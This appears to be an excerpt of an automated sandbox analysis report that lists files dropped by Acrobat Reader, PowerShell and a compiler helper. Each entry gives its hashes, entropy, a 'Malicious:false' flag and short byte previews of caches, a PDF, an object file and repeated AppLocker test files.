                                                                                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"379b7017e5b0c23d0fc8b300350a5c0a","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1732867755000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"84873f582a51ccec577375741eff92a7","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1732867755000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"f2d143a691f2427b134d2854bfe7e026","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1732867755000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"9dfaf53d383489738e403ab758eeacd3","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1732867755000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"1e4ab262c25eb2acdea140ec1071d1e3","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1732867755000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"e4bcba68501760fc7da67cb91b982213","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):40887
                                                                                                          Entropy (8bit):5.480223082781645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:cmYmhi/rU/wqtMfg2fghtxZcJEy5wpYNg7y:7Ymhi/rU/wqtMg6gvxZY5cYyu
                                                                                                          MD5:3A5C3949FB9C29B9C92710B1FAB45E82
                                                                                                          SHA1:367D90F968F0266124955AE77D4630C80E744558
                                                                                                          SHA-256:8B88DA4A45B2DD57A665395D4EEB9A215C6824C2AC8759B984B97F87BE2F1A53
                                                                                                          SHA-512:4D36D64FC62EB8F0A60860FECB67DD07EC6643A846CB9CB1AAEFAE3FDD9E977795FCA87140E458FCD12A2D9A705EB6DB1A66BCDA46FB6BE97B30F8DE46C3B78E
                                                                                                          Malicious:false
                                                                                                          Preview:4.241.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2:o:..........:F:Arial-BoldItalicMT.P:Arial Bold Italic.L:$.........................."F:Arial.#.93.FID.2:o:..........:F:Arial-Black.P:Arial Black.L:-.........................."F:Arial Black.#.105.FID.2:o:..........:F:Bahnschrift.P:Bahnschrift Light.L:&...............,.........."F
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20010
                                                                                                          Entropy (8bit):5.02483968322263
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Prib43WKmVoGIpN6KQkj2Fkjh4iUxDhQIeFzUpX+OdBNNXp5yvOjJlYoaYpib47:PRWKmV3IpNBQkj2Uh4iUxDhiFzUpX+Oh
                                                                                                          MD5:435D032DDB5301D507119F054ABE9587
                                                                                                          SHA1:E5D4154F38575B85F59ECEBAED506F2C8EBB9F73
                                                                                                          SHA-256:A0309E124EAB5BCDEA5BF518D641576499DE7FEAA5662CC95F6ABD5EAF5853E9
                                                                                                          SHA-512:23B177CC2418E2A5677DE81CBE648CA651C7DA91E06D7847C02015FA89D2A3B321800DC5E9C6E6B028436ED54A56A36785058F73C12836DC774C24BDA3E182C1
                                                                                                          Malicious:false
                                                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):1.0818136700495735
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:NlllulZlZ:NllUZ
                                                                                                          MD5:25346235FA00D9DDBA8403DF10E961DD
                                                                                                          SHA1:D1FED45C7DB001619D756CE08DE510C5072CE774
                                                                                                          SHA-256:ACF1301FA6A5870DC669189DD0D2CE3E7BDEE27D3BB0BFDAF37052F9FB1CC055
                                                                                                          SHA-512:1C2AA8AD5E7C37777EFDD0B87AC39E6E746E2B95200E5E1958DA0C6275EDE1A2ABF128908C51D3D40E92EE16E0B9A1857DE36AFE931403DDEEC13CDC29CA2568
                                                                                                          Malicious:false
                                                                                                          Preview:@...e...............................X................@..........
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:PDF document, version 1.4, 6 pages
                                                                                                          Category:dropped
                                                                                                          Size (bytes):697614
                                                                                                          Entropy (8bit):7.968027157453129
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:1QvArwKDKoohI9o1QzuRzBscQfmPofwzX7O84dST15oHECIqsbNrHnOgD7:RrbOHEoWziBGmPofwzX775ok7bb9HnJP
                                                                                                          MD5:8EC7F7E15BA01475008317EB37D7BA60
                                                                                                          SHA1:86CBAEFAD165E4B4A7DAD47C8536546A0ACF0C1D
                                                                                                          SHA-256:A0E2935E165F58ED428CD96DF8EC369DBA1588E1A3DE0A0C85291B648504B903
                                                                                                          SHA-512:5BB2E62685F29573B71036638237134E5E66CB42C179EFF9D05E349870A5366D07549FDCA8650B6B5EFE0AFEE873A0FD4C9BBF3D27776629535AF509C37FE3B9
                                                                                                          Malicious:false
                                                                                                          Preview:%PDF-1.4.%.....12 0 obj.<<./Subtype /Image./Width 1241./Height 1754./ColorSpace /DeviceRGB./BitsPerComponent 8./Filter [/FlateDecode /DCTDecode]./DecodeParms [null <<./Quality 60.>>]./Length 167522.>>.stream.x...X...Z.K @..4..K.@...<.4N...5...q.. Hp'...w...n..^g...g...{.s.}.}.....k.....9f5|.>...X.001.bab`bcc..?&....#.x......+..3'....sq.f.a...k9%e%.!...o....o/.......OKHH+...-....o.p.M.L"#Q.wp..q...%. .".z..... .....E.4.....$d.;(..((..^.....*..v.4|..Tv..."..~Y.Pip..S......C.G$Oi...........}%&.!)%.....V..40426153wptrvqus.{....!....1&6.S|BZzFfVvNn^..........]C.#.c...S..K.+.k.....G.'.g.....B......w......d...z!.q.=.....;...".[;|*.ww.^F~).~..Si.P.~....k...m.~....b...j....^S.}d$D.!.. .x.>.......Zfa.)..`'...t.8)4.U.:g....<L...i^..[..1......N80.... ...Vjk..?v.m:........)0?L.0.5..c\.T.%P......@Q7..........2.S...M.`......n...if...v_[|..Q......c.....7........u......}7.I....1......v...&....M....w.E..&..4,.H....O/..-...a..O..6P.jT.SL.QSR......|...r..*
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Nov 29 08:08:55 2024, 1st section name ".debug$S"
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1332
                                                                                                          Entropy (8bit):3.9741315309209404
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:H1FzW9nvKn9c8HNwKGmNII+ycuZhN1akSzPNnqS2d:ivK/OKGmu1ul1a35qSG
                                                                                                          MD5:19397E84CBFB8597F5FD8AAFDF645FC0
                                                                                                          SHA1:0739F47A2AE2A0D4521AFECD4EAA103A9074402C
                                                                                                          SHA-256:C84A58108C52F5EE6F9E8F69E41DCAAC59AD8639BF2F414A01F7EF2F53A53EBF
                                                                                                          SHA-512:CAEEF16D29BB917D00D462D0AA1029D22DC389619E4B470B22911DD45CAF641F842EBBD09FC94D24184C01A99E290B980429AD93A98D492499ADE8A41410AC21
                                                                                                          Malicious:false
                                                                                                          Preview:L....vIg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\lgpiiklc\CSCCB9B20FB8C54707B662B684DAE4C90.TMP.................,..% \:.1Km.............5.......C:\Users\user\AppData\Local\Temp\RESBEED.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.g.p.i.i.k.l.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57837
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1418364
                                                                                                          Entropy (8bit):7.976384385897213
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:tGZK9IeQYIGCa29WH+yzG2FZrj1bLgiZMHLRS9y8hBjnn9T5TcgyCCw/hn90hhcB:tGZK9IeQZGWWHZzG2N0i+LRS9yan9Ggn
                                                                                                          MD5:9DC63352ECE5DA6BCB6CA92BAA3520A5
                                                                                                          SHA1:BA5995F3EA85AC8171027F095A3DF67951F2A656
                                                                                                          SHA-256:2D7C28E3B9FE6C06B20EBC021F35893CCE9B1AC4CC303FF5EB734A8AE4A5C44F
                                                                                                          SHA-512:BEBF8645CEC51787E98AF897E261757040E1D11BD61471BE72C09A5423F8ACA3EAE79521BDCD60A65258EFBCB5CF2AA33116723967644327A70B19B19ADF43BB
                                                                                                          Malicious:false
                                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 633642
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1405907
                                                                                                          Entropy (8bit):7.975945065391471
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:kGZK9Iexj1bLgiZMHLRS9y8hBjnn9T5TcgyCCw/hn90hhcnDaYIGCa2zOWH1zG2E:kGZK9Ief0i+LRS9yan9GgEw/hqhhyDam
                                                                                                          MD5:FC1E66BAADDBB958C64BF650BA209D77
                                                                                                          SHA1:A250EDAD55729CD530AE07C29EE0F0EDCED2E761
                                                                                                          SHA-256:29D348C62D9CADA5873AF904D7E984E884CBA0AA99CBCB531615A99E425FC9DB
                                                                                                          SHA-512:DB6A7D1C3DD0584B1B29B3C5B53AE32736484336F3DB0DD32B59C27F1382D8C76EB60822E74EB58E9EF7AB063C6DF4369CB1FBEA892D2714FFC1B4B5BD64924E
                                                                                                          Malicious:false
                                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1083554
